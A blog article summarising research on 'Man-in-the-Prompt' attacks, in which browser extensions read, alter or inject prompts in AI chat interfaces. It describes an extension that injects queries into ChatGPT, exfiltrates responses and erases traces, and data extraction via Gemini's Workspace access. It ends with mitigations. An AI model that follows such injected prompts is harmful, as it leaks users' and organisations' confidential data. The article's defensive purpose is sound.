Hidden Vulnerabilities in Browser-Based Generative AI Usage

Users and organizations are increasingly rely on generative AI (artificial intelligence) tools to streamline workflows, enhance productivity, and handle sensitive data. But new security threats are emerging, some of which could have serious consequences. Recent research highlights a growing vulnerability with AI usage and browser extensions, which can be exploited to manipulate prompts and exfiltrate valuable information.

Man-in-the-Prompt Attacks

LayerX researchers have identified a novel exploit that targets AI tools integrated into web browsers and potentially affecting both public and internal systems. The core issue lies in how many AI interfaces are embedded directly into web pages, making them accessible through browser extensions.

Browser extensions can access a website page’s underlying code, known as the Document Object Model (DOM). When interacting with AI tools like ChatGPT, Google Gemini, or internal copilots, the prompt input fields are part of this DOM. This could allow malicious or compromised extensions to secretly read, alter, or inject prompts, and even enable:

  • Prompt injection: Inserting hidden instructions or commands.
  • Data exfiltration: Stealing sensitive data from prompts, responses, or session history.
  • Model manipulation: Tricking AI systems into revealing confidential information or performing unintended actions.

Because many extensions operate with broad privileges and require no special permissions, they can be used maliciously without raising suspicion.

The widespread use of AI tools, combined with the numerous browser extensions that users often have installed, greatly increases the potential for vulnerabilities. ChatGPT alone, for example, sees over 5 billion visits each month, with millions of enterprise users relying on internal and external LLMs (Large Language Models). Most users, including enterprise employees, have installed extensions, many of which are legitimate, but some may be malicious, vulnerable or compromised.
Sensitive data often processed by AI including proprietary company information, legal documents, customer PII, or strategic data could lead to loss of intellectual property, regulatory violations, or reputation damage.

Researchers were also able to demonstrate how a simple, permission-less extension could inject queries into ChatGPT, exfiltrate responses, and erase traces—potentially allowing attackers to steal conversations or sensitive data. The same technique was shown to extract confidential corporate data from Google Workspace integrations with Gemini AI, which has access to emails, files, and shared documents.

Hosted LLMs aren’t entirely safe either. Many companies deploy internally hosted LLMs trained on confidential data—such as source code, legal files, or HR records. These models are often accessed via browser-based interfaces, making them vulnerable to extension-based attacks. An attacker could silently query internal systems, extract trade secrets, or gather intelligence without detection.

Traditional security measures are insufficient because they can’t monitor DOM-level interactions or detect prompt manipulations. To mitigate these risks, organizations should:

  • Implement in-browser behavior monitoring: Track DOM interactions and detect suspicious activity or unusual extension behavior.
  • Restrict or block risky extensions: Use behavioral analysis and reputation scores to identify and prevent malicious extensions, even those requiring no permissions.
  • Enforce security policies on web interfaces: Limit or monitor how AI prompts are accessed and manipulated.
  • Educate users: Raise awareness about the risks of installing unvetted browser extensions and promote best practices.

As AI tools become more integrated into daily workflows, understanding their vulnerabilities is crucial. Browser extension exploits represent a significant blind spot that can lead to data breaches and operational risks. Staying vigilant, updating security strategies, and adopting proactive monitoring can help protect sensitive information from unseen threats lurking in the browser.

For the full details and insights of the research, visit LayerX’s analysis post here.


Comments Section

Leave a Reply

Your email address will not be published. Required fields are marked *


,
Back to Top - Modernizing Tech